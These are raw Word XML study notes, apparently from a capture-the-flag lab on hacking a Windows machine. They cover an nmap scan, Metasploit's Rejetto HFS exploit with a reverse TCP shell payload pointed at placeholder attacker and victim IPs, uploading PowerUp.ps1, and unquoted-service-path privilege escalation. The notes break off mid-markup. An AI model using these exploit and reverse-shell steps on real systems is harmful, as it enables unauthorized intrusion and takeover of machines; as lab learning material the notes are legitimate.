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3292A" w14:textId="71AB2031" w:rsidR="000E399D" w:rsidRDefault="00142897">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Topic: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hacking into a Windows machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE44CFB" w14:textId="77777777" w:rsidR="00DA4039" w:rsidRDefault="00FF45D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Good links: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFEFC20" w14:textId="5DA28BFA" w:rsidR="00FF45DC" w:rsidRDefault="001545B8" w:rsidP="00DA4039">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00DA4039" w:rsidRPr="00A76D6F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://blog.razrsec.uk/steel-mountain-walkthrough/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="75D5AE6D" w14:textId="53C596B4" w:rsidR="00DA4039" w:rsidRDefault="001545B8" w:rsidP="00DA4039">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00976FCB" w:rsidRPr="00A76D6F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://exploit-db.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E336921" w14:textId="05324028" w:rsidR="00FE0817" w:rsidRDefault="00FE0817" w:rsidP="00FE0817">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerUp.ps1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">cheatsheet: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="000873D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://blog.certcube.com/powerup-cheatsheet/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54DC79E9" w14:textId="77777777" w:rsidR="00FE0817" w:rsidRPr="00FE0817" w:rsidRDefault="00FE0817" w:rsidP="00DA4039">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="546B9424" w14:textId="241DD248" w:rsidR="00976FCB" w:rsidRDefault="00976FCB" w:rsidP="00E56ED2">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E760D88" w14:textId="77777777" w:rsidR="00DA4039" w:rsidRPr="00DA4039" w:rsidRDefault="00DA4039" w:rsidP="00DA4039">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A3EB81" w14:textId="2B8E97C8" w:rsidR="00142897" w:rsidRDefault="00142897">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1861A914" w14:textId="05790C07" w:rsidR="00142897" w:rsidRPr="000F3E8D" w:rsidRDefault="00142897">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>+Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="000F3E8D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="000F3E8D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gain initial access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A58A0B3" w14:textId="0FA91ECF" w:rsidR="00142897" w:rsidRPr="00224E73" w:rsidRDefault="00142897">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>+PowerShell</w:t>
      </w:r>
      <w:r w:rsidR="00224E73">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00224E73">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">privilege </w:t>
      </w:r>
      <w:r w:rsidR="00AF0DF5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>escalation</w:t>
      </w:r>
      <w:r w:rsidR="00224E73">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C44E206" w14:textId="6BBFCBC0" w:rsidR="00204D7C" w:rsidRDefault="00142897">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>+? (new technique)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F8663C" w14:textId="0758FC0B" w:rsidR="005C6620" w:rsidRDefault="005C6620">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D50C89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CA"/>
        </w:rPr>
        <w:t>PowerUp.ps1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: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">store </w:t>
      </w:r>
      <w:r w:rsidRPr="00D50C89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>windows privilege escalations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> vectors based on misconfig!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC9EAB7" w14:textId="53DD6120" w:rsidR="00D50C89" w:rsidRDefault="00D50C8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Check for any </w:t>
      </w:r>
      <w:r w:rsidR="005E316D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>misconfigs, abnormalities</w:t>
      </w:r>
      <w:r w:rsidR="00275AF8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE3F352" w14:textId="1352E3B7" w:rsidR="00275AF8" w:rsidRDefault="00275AF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[+] list of services and their info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597B23A5" w14:textId="64134D67" w:rsidR="00204D7C" w:rsidRDefault="00204D7C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="538D47CD" w14:textId="0A947049" w:rsidR="00204D7C" w:rsidRPr="00EA663E" w:rsidRDefault="00204D7C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA663E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Task 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA468F9" w14:textId="44CBC388" w:rsidR="00204D7C" w:rsidRDefault="00204D7C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse image scanning </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5819225B" w14:textId="13C83DA0" w:rsidR="00204D7C" w:rsidRDefault="00204D7C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lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Curl -s &lt;the links&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F0DF4C" w14:textId="4AB3149D" w:rsidR="00E7431E" w:rsidRDefault="00E7431E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="532AB91B" w14:textId="1A86B853" w:rsidR="00E7431E" w:rsidRPr="00EA663E" w:rsidRDefault="00E7431E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA663E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Task 2: Initial Access with Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104816AC" w14:textId="4DC8E5CF" w:rsidR="00FF45DC" w:rsidRDefault="00D717EF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b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nmap -sV -sC -A -vv -T3</w:t>
      </w:r>
      <w:r w:rsidR="00305E0F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F252685" w14:textId="7432008F" w:rsidR="00EA663E" w:rsidRDefault="00EA663E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000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EA663E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Gain</w:t>
      </w:r>
      <w:r w:rsidR="00B329E3">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Shell Access:</w:t>
      </w:r>
      <w:r w:rsidR="005C7E4E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4C6098" w14:textId="70164593" w:rsidR="005C7E4E" w:rsidRPr="00970427" w:rsidRDefault="005C7E4E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00970427">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use exploit/windows/http/</w:t>
      </w:r>
      <w:r w:rsidRPr="00970427">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rejetto_hfs_exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332B9FCB" w14:textId="79023ED7" w:rsidR="00B329E3" w:rsidRDefault="00B329E3" w:rsidP="00B329E3">
      <w:pPr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Show options --- show module para options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9DFC99" w14:textId="77777777" w:rsidR="00B329E3" w:rsidRPr="004B0B79" w:rsidRDefault="00B329E3" w:rsidP="00B329E3">
      <w:pPr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4B0B7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set payload windows/x64/shell/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F048DB" w14:textId="77777777" w:rsidR="00B329E3" w:rsidRPr="004B0B79" w:rsidRDefault="00B329E3" w:rsidP="00B329E3">
      <w:pPr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4B0B7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set RHOST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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004B0B7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victim ip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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B27DA25" w14:textId="6631A62E" w:rsidR="00B329E3" w:rsidRDefault="00B329E3" w:rsidP="00B329E3">
      <w:pPr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4B0B7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set LHOST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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004B0B7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attacker ip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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C11817" w14:textId="2361D199" w:rsidR="00B329E3" w:rsidRPr="004B0B79" w:rsidRDefault="00B329E3" w:rsidP="00B329E3">
      <w:pPr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set RPORT 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E87617" w14:textId="20DDF71A" w:rsidR="00B329E3" w:rsidRDefault="00B329E3" w:rsidP="00B329E3">
      <w:pPr>
        <w:ind w:left="72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CA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B0B7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CA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>run !</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5D68E6" w14:textId="77777777" w:rsidR="00EF7FF5" w:rsidRPr="004B0B79" w:rsidRDefault="00EF7FF5" w:rsidP="00B329E3">
      <w:pPr>
        <w:ind w:left="72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CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4296E265" w14:textId="3D08C00F" w:rsidR="00B329E3" w:rsidRDefault="001411B7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Task 3: Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659BBAB0" w14:textId="3C11A25D" w:rsidR="00831145" w:rsidRDefault="00831145" w:rsidP="00831145">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EA663E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Gain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Meterpreter Access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34382057" w14:textId="07797EA1" w:rsidR="00F2422B" w:rsidRDefault="00F2422B" w:rsidP="00831145">
      <w:pP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  <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidRPr="00F2422B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set payloads to meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFB982A" w14:textId="77777777" w:rsidR="00152D4F" w:rsidRDefault="00152D4F" w:rsidP="00831145">
      <w:pP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14:paraId="40A7A20E" w14:textId="21CB3531" w:rsidR="00F2422B" w:rsidRDefault="00152D4F" w:rsidP="00831145">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Meterpreter Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC460BC" w14:textId="014B76D9" w:rsidR="00152D4F" w:rsidRDefault="00152D4F" w:rsidP="00831145">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Uploads </w:t>
      </w:r>
      <w:r w:rsidR="0047410C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&lt;path&gt;/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PowerUp.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F2422B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</w:t>
      </w:r>
      <w:r w:rsidR="0029449C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----- </w:t>
      </w:r>
      <w:r w:rsidR="00F76685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Up</w:t>
      </w:r>
      <w:r w:rsidR="0029449C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> load</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the local shell to target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B84D9DE" w14:textId="77777777" w:rsidR="00100B1A" w:rsidRDefault="00100B1A" w:rsidP="00100B1A">
      <w:pP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>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Load PowerShell  ----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load powershell extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B9C484" w14:textId="24280281" w:rsidR="000C2306" w:rsidRDefault="000C2306" w:rsidP="00831145">
      <w:pP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Powershell_shell</w:t>
      </w:r>
      <w:r w:rsidR="00100B1A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 ---- jump to it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD8AD91" w14:textId="1C381BE3" w:rsidR="000C2306" w:rsidRDefault="00100B1A" w:rsidP="00831145">
      <w:pPr>
        <w:rPr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ab/>
      </w:r>
      <w:r w:rsidR="000C2306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. .\PowerUp.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E50653E" w14:textId="2A1FCA52" w:rsidR="00152D4F" w:rsidRDefault="00152D4F" w:rsidP="00831145">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="006B136B" w:rsidRPr="00620144">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://blog.certcube.com/powerup-cheatsheet/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73C722B1" w14:textId="20A1833C" w:rsidR="006B136B" w:rsidRDefault="006B136B" w:rsidP="00831145">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43A018C8" w14:textId="19224969" w:rsidR="006B136B" w:rsidRPr="00DC379E" w:rsidRDefault="006B136B" w:rsidP="006B136B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26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ab/>
      </w:r>
      <w:r w:rsidRPr="00DC379E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Generate a reverse Shell (Windows Executable )</w:t>
      </w:r>
      <w:r w:rsidR="00CA6557">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> có Admin Privilege</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC379E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234B6673" w14:textId="2BD8D5FE" w:rsidR="003E2E8D" w:rsidRDefault="003E2E8D" w:rsidP="006B136B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E2E8D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618FC79" wp14:editId="3F0F9655">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1550063</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>225646</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3005593" cy="1874322"/>
            <wp:effectExtent l="0" t="0" r="4445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593" cy="18743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FF0000"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 xml:space="preserve">Idea: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PowerUp.ps1 script spits out a list of services and their useful information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C8A16E" w14:textId="1D8C5656" w:rsidR="003E2E8D" w:rsidRDefault="003E2E8D" w:rsidP="006B136B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BF6A48D" w14:textId="0CA56316" w:rsidR="003E2E8D" w:rsidRDefault="003E2E8D" w:rsidP="006B136B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C04CC4C" w14:textId="6F1E5AB8" w:rsidR="003E2E8D" w:rsidRDefault="003E2E8D" w:rsidP="006B136B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8B403F" w14:textId="1DF66EC7" w:rsidR="003E2E8D" w:rsidRDefault="003E2E8D" w:rsidP="006B136B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D84063E" w14:textId="1CF0319F" w:rsidR="003E2E8D" w:rsidRDefault="003E2E8D" w:rsidP="006B136B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45AC63F9" w14:textId="20BD0317" w:rsidR="003E2E8D" w:rsidRDefault="003E2E8D" w:rsidP="006B136B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A741F3" w14:textId="74D32F0A" w:rsidR="003E2E8D" w:rsidRPr="003E2E8D" w:rsidRDefault="003E2E8D" w:rsidP="006B136B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61B73BDB" w14:textId="553E8C19" w:rsidR="00BF2187" w:rsidRDefault="009D4D2C" w:rsidP="009D4D2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ASC service</w:t>
      </w:r>
      <w:r w:rsidR="00B243B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F10604">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Flaws: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA39027" w14:textId="3AC6D133" w:rsidR="00155B86" w:rsidRDefault="00BF2187" w:rsidP="00155B86">
      <w:pPr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_</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2187">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E266FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unquoted Service Path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568483E1" w14:textId="0AD1484F" w:rsidR="00BF2187" w:rsidRDefault="00BF2187" w:rsidP="00BF2187">
      <w:pPr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_</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2187">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the directory </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25324983" w14:textId="74AA4ECB" w:rsidR="009D4D2C" w:rsidRDefault="00BF2187" w:rsidP="00BF2187">
      <w:pPr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_</w:t>
      </w:r>
      <w:r w:rsidR="00B2205F" w:rsidRPr="00BF2187">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CanRestart</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs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True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449DB9DB" w14:textId="54A323A5" w:rsidR="00AA63DA" w:rsidRPr="005968F8" w:rsidRDefault="00AA63DA" w:rsidP="00BF2187">
      <w:pPr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_</w:t>
      </w:r>
      <w:r w:rsidRPr="00B820DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>StartName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: LocalSystem</w:t>
      </w:r>
      <w:r w:rsidR="00467DA8">
        <w:rPr>
